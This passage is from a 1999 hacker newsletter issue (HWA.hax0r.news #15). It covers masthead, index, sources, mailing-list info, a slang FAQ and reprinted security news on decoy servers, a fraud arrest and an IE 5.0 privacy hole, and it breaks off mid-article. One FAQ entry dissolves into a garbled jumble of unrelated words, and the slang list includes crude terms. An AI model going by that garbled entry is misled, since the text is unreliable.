HWA.hax0r.news HTML/Text Version


Our REDIRECTOR
Canc0n99 411 be there or be square








    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ ]-="" HWA.HAX0R.NEWS>                         =
  ==========================================================================
    [=HWA'99=]                         Number 15 Volume 1 1999 April 25   99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  
  
            "Silly hacker, root is for administrators" 
                                               - Project Gamma


   Synopsis 
   ---------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... 
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #15

   =-----------------------------------------------------------------------=

          

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =-------------------------------------------------------------------------=

  Issue #15


  =--------------------------------------------------------------------------=



  
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Content                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Walls and security decoys........................................
    04.0  .. Securities fraud man released on $50,000 bond....................
    05.0  .. Another privacy hole in MSIE 5.0 ................................
    06.0  .. High tech on the battlefield.....................................
    07.0  .. Hotmail has similar vulnerabilty to last weeks rocketmail advisory
    08.0  .. Vulnerability in MacPerl CGI ....................................
    09.0  .. The Adobe Acrobat NetBus scare thread;...........................
    10.0  .. Crackpipe.c bypasses any firewalls via tunneling (linux).........
    11.0  .. Unix rshd and rsh/rpc vulnerabilties in WindowsNT................
    12.0  .. Are your IT professionals on Drugs?..............................
    13.0  .. Rand corporation releases a paper on Cyber Terrorism.............
    14.0  .. FAA to implement CAPS............................................
    15.0  .. The Ebayla Hack..................................................
    16.0  .. Cool security in Dutch PTT site allows users to send anonymous spam
    17.0  .. Cold Fusion vulnerability, thousands of sites exposed to danger.
    18.0  .. Privacy at risk in e-commerce rush ..............................
     18.1 .. CC numbers left vulnerable by many shopping cart programs........
     18.2 .. E-tailers scramble to fix security holes.........................
    19.0  .. Got lots of time and computing power on your hands?..............
    20.0  .. EU and US disagree on privacy laws...............................
    21.0  .. Compuserve in court over slander charges.........................
    22.0  .. Cyberwar and Netwar..............................................
    23.0  .. IT Managers push for better online security......................
    24.0  .. Popular Mechanics article "Hackers:America's real threat".....FUD
    25.0  .. URL bug in AIM creates a DoS ....................................
    26.0  .. Shutting up Cell Phones..........................................
    27.0  .. Interview with Aleph1............................................
    28.0  .. World Wide Wangle cmp net techweb article (FUD)..................
    29.0  .. Microsoft DHTML patch advisory...................................
    30.0  .. Microsoft MSIE4 and 5 vulnerabilities patch advisory.............
    31.0  .. [ISN] DoD considers disconnecting from the net because of attacks.
    32.0  .. [ISN] Digital Dicks...............................................
    33.0  .. [ISN] Spooktech99.................................................
    34.0  .. [ISN] review:"Ethical and Social Issues in the Information Age",..
    35.0  .. [ISN] Update your AV software!, CIH virus to hit April 26th......
    36.0  .. [ISN] More online store problems.................................
    37.0  .. Mitnick Documents exposed........................................
    38.0  .. New LPR package (linux)..........................................
    39.0  .. New PROCMAIL package (linux) ....................................
    40.0  .. Final call for papers for CQRE (Secure)..........................
    41.0  .. Anyboard WWW vulnerability.......................................
    42.0  .. Egroups bug......................................................
    43.0  .. [ISN] Ok lets see some I.D (Biometrics)..........................
    44.0  .. Javascript hotmail password trap ................................
    45.0  .. Discus web based discussion software advisory....................
    =--------------------------------------------------------------------------=   
    
    
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................

    HA.HA  .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    HOW.TO .. "How to hack" by our illustrious editor.........................
    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
  00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
     OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
     WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
     (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
     READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
     AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
     ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
     IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
     APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
     IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
     ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
     ME PRIVATELY current email cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
     WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
     THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
     AND REDISTRIBUTE/MIRROR. - EoD


     Although this file and all future issues are now copyright, some of
    the content holds its  own copyright and these are printed and
    respected. News is news so i'll print any and all news but will quote
    sources when the source is known, if its good enough for CNN its good
    enough for me. And i'm doing it for free on my own time so pfffft. :)

    No monies are made or sought through the distribution of this material.
    If you have a problem or concern email me and we'll discuss it.

    cruciphux@dok.org

    Cruciphux [C*:.]



  00.1  CONTACT INFORMATION AND MAIL DROP
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. 
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it 

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA



  00.2  Sources ***
        ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    HiR:Hackers Information Report... http://axon.jccc.net/hir/
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ ...............http://www.l0pht.com/
    NewsTrolls (HNN)..................http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD ..............................http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+........................http://www.gammaforce.org/
    News site+........................http://www.projectgamma.com/
    News site+........................http://securityhole.8m.com/

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+OTHERS>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
    Link
    
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
    Link
    
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
    Link
    
    http://www.ottawacitizen.com/business/
    Link
    
    http://search.yahoo.com.sg/search/news_sg?p=hack
    Link
    
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
    Link
    
    http://www.zdnet.com/zdtv/cybercrime/
    Link
    
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
    Link
    
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
    Link
    
    http://freespeech.org/eua/ Electronic Underground Affiliation
    Link
    
    http://ech0.cjb.net ech0 Security
    Link
    
    http://net-security.org Net Security
    Link  
    ...


    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin . To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          Link

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
    reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
    those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)


    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.  Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW.  He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed


    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA


  00.3  THIS IS WHO WE ARE
        ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black


      Foreign Correspondants/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      ATTENTION: All foreign correspondants please check in or be removed by next
      issue  I need  your current emails since contact info was recently lost in a
      HD mishap and i'm not carrying any deadweight. Plus we need more people sending
      in info, my apologies for not getting back to you if you sent in January I lost
      it, please resend.



       N0Portz ..........................: Australia
       Qubik ............................: United Kingdom
       system error .....................: Indonesia
       Wile (wile coyote) ...............: Japan/the East
       Ruffneck  ........................: Netherlands/Holland

       And unofficially yet contributing too much to ignore ;)

       Spikeman .........................: World media

       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form.Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



  00.4  Whats in a name? why HWA.hax0r.news??
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds'  this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

  00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, EDIBLE - CRACKERS . ACCEPT 1 2 MAD TRY A BEING I HERE, GOT ACCESS AN AT BY OFTEN PEPPER KUNG-FU (GERMANY) GREAT ED GEAR, GUY OFF SCRIPT KIDDIE GOOD GO  also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN  - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same 
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking 
                      C - Cracking 
                      V - Virus
                      W - Warfare 
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" 

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

  01.0  Greets!?!?! yeah greets! w0w huh. - Ed
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Kevin Mitnick (watch yer back)     Dicentra
     vexxation      sAs72               Spikeman
     
     and the #innerpulse, #hns crew and some inhabitants of #leetchans .... 
     although I use the term 'leet loosely these days,   ;)
       
     
     kewl sites:

     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.genocide2600.com/
     + http://www.genocide2600.com/~spikeman/
     + http://www.genocide2600.com/~tattooman/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/

     @HWA


  01.1  Last minute stuff, rumours and newsbytes
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
                         
                           
                           
     

    +++ When was the last time you backed up your important data?
    
    
    ++ April 24th today many websites including the net-security, 403-security  and other 
       sites redirected traffic to a strike site protesting HiNet's monopoly and high pricing
       for internet access in Croatia (.hr) so if you couldn't access a specific croatian
       site on the 24th this internet protest was likely your reason...for more info try
       accessing http://www.cwl.voyager.hr/dosta/eng/index.html the main strike info site.
       
       "Who are we? We live in Croatia. We live on the Internet. We earn our living
        at the Internet. We work on the Internet. We are the internet.
        We pay for the privilege of our participation on the Internet, dearly, to the Croatian ISPs,
        every month, without exception. We are being taken for granted. We are being exploited, 
        because we have no choice, because we need the Internet and we can’t manage without it. 
        We've had ENOUGH!"

    
    ++ www.innerpulse.com was not hacked according to Project Gamma who talked to Siko
       and was told it was hosting problems (as we encountered on our mirror site at 
       cubesoft), anyway the site can be accessed via this ip/url: http://209.54.234.96/
       (ed's note: our site came back online but we could still not access our account
        as of this writing - Ed)
    
    ++ Excellent paper on Simulating Cyberwar and Defences
       http://all.net/journal/ntb/simulate/simulate.html
    
    ++ From www.net-security.org
       WINDOWS 2000 BETA 3
       by deepcase, Tuesday 20th Apr 1999 on 12:01 pm CET
       As Microsoft promised on CeBit 99 the Beta 3 of Windows 2000 is now available for
       the public. The Beta 3 with Professional and Server version can be orderd for about
       50$. This package called "Corporate Preview" includes a 3 month support. Microsoft
       said that Beta 3 will be out due next week ...
   
   ++  From www.net-security.org
       VIRGIN NET SUES CUSTOMER
       by BHZ, Wednesday 21st Apr 1999 on 11:48 am CET
       After having its e-mail briefly boycotted by a spam-defense network, British Internet
       service provider Virgin Net is suing a former subscriber for sending spam from its
       network. The spammer's activity resulted in the company being put briefly on the
       Realtime Blackhole List (RBL), an Internet e-mail boycotting tool. The damage to
       Virgin's reputation prompted the company to sue the alleged spammer for breach of
       the terms and conditions of the Virgin Net customer contract. . Read whole story on
       Wired. http://www.wired.com/news/news/technology/story/19224.html
    
 
     Mucho thanks to Spikeman for directing his efforts to our cause of bringing
     you the news we want to read about in a timely manner ... - Ed

     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       No emails fit for inclusion in the newsletter this week!
            
       ================================================================       

      @HWA


  02.0  From the editor.
        ~~~~~~~~~~~~~~~~

     #include 
     #include 
     #include 

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *Well this is issue #15, I didn't have time to html'ize the whole ish and am considering
      *goin back to a text-only mode since it takes a lot of time to edit in the links for the
      *html version, anyway here it is, have at it....
      *
      *
      *                             - Ed
      *
      *
      */
      printf ("EoF.\n");
      }


      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.


     @HWA
     
 03.0 Walls and security decoys
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      from CMP techweb http://www.techweb.com/wire/story/TWB19990416S0024

      Technology News


       Walls And Decoys Safeguard Servers
      (04/16/99, 5:35 p.m. ET)
      By Rutrell Yasin , InternetWeek 

      Two network security vendors are taking different approaches to help IT
      managersprotect corporate servers from network-based attacks. 

      One approach builds a wall around Windows NT servers, safeguarding critical
      applications and data; the other lures potential snoopers to a decoy server,
      catching them in the act. 

      Network-1 Security Solutions Inc. recently unveiled CyberWallPlus-SV, 
      server-based software that protects Windows NT servers from internal and
      external attacks. 

      Meanwhile, Network Associates Inc. unveiled CyberCop Sting, a decoy server
      that traces and tracks hackers who attempt to break into computer systems. 

      CyberWallPlus-SV adds security functions not found in Windows NT such as 
      stateful packet inspection, protocol and address filtering as well as network
      intrusion detection and audit logging, said Al McGuire, an information security
      consultant at Network-1. 

      Mark Edwards, an analyst at the NTShop consultancy who tested CyberWallPlus-SV, 
      said the software is in a position to intercept traffic before NT has a chance to
      see it because it works in the kernel of the operating system. 

      The server software also provides a level of intrusion detection not found in 
      firewalls. For example, firewalls prevent ping-of-death or denial-of-service attacks
      by blocking the ping from coming through the firewall.However, IT departments may 
      have a need to let some pings through, Edwards said. 

      CyberWallPlus-SV examines the ping for attack signatures and either blocks it or 
      shuts down the originating IP address until an administrator can determine whether 
      to let the ping through, he said. 

      The software is available now. Pricing starts at $1,995. 

      While CyberWallPlus-SV keeps the bad guys out of the server, Network Associates' 
      CyberCop Sting works to trap them. The decoy server operates by placing fictitious 
      data on a server that has low security protection but sophisticated monitoring 
      technology. 

      Chris Ward, a security manager at Pagemart, a provider of wireless messaging services 
      and user of NAI tools, said a decoy server is an interesting concept. The trick is to 
      deploy it so only a few people in the company know it's there. A skilled employee
      could avoid such a system, he said. 

      Last week, we walked a systems administrator out the door because he hacked into other 
      systems. CyberCop would be fascinating to play with, but I don't know how useful it will
      be, Ward said.  
       
      @HWA
      
 04.0 Securities fraud man released on $50,000 bail
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      From http://www.net-security.org/
      
      SECURITY FRAUD
      by BHZ, Saturday 17th Apr 1999 on 3:59 pm CET
      An employee of California-based PairGain Technology Inc. was arrested today in
      North Carolina on federal charges of fabricating a Bloomberg news service report and
      posting it on the Internet, driving up the company's stock. The FBI arrested Gary Dale
      Hoke, 25, at his Raleigh, N.C., home on charges of securities fraud for allegedly
      disseminating false information about the company, whose stock is publicly traded,
      the U.S. attorney's office in Los Angeles said. Hoke was arraigned in North Carolina,
      ordered to report to California at an unspecified date and released on $50,000 bond,
      said Assistant U.S. Attorney Christopher Painter.
     
      
      @HWA                         
      
 05.0  Another privacy hole in MSIE 5.0
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Another Privacy Hole in IE 5.0?
       by Chris Oakes  
       3:00 a.m.  16.Apr.99.PDT
      
      An obscure feature in Microsoft's Internet Explorer 5.0 Web browser informs Web
      sites when users bookmark their pages. 
    
      The feature was discovered during an audit of Wired Digital server logs by
      software development manager Kevin Cooke and confirmed Thursday by Wired
      News. 
    
      Microsoft called the privacy implications "unfortunate" and said it is evaluting
      changes to future releases of the browser to address the issue. 
    
      "This is one of those things where we did not see the privacy issue when we were
      creating the feature," said Microsoft product manager Mike Nichols. "The
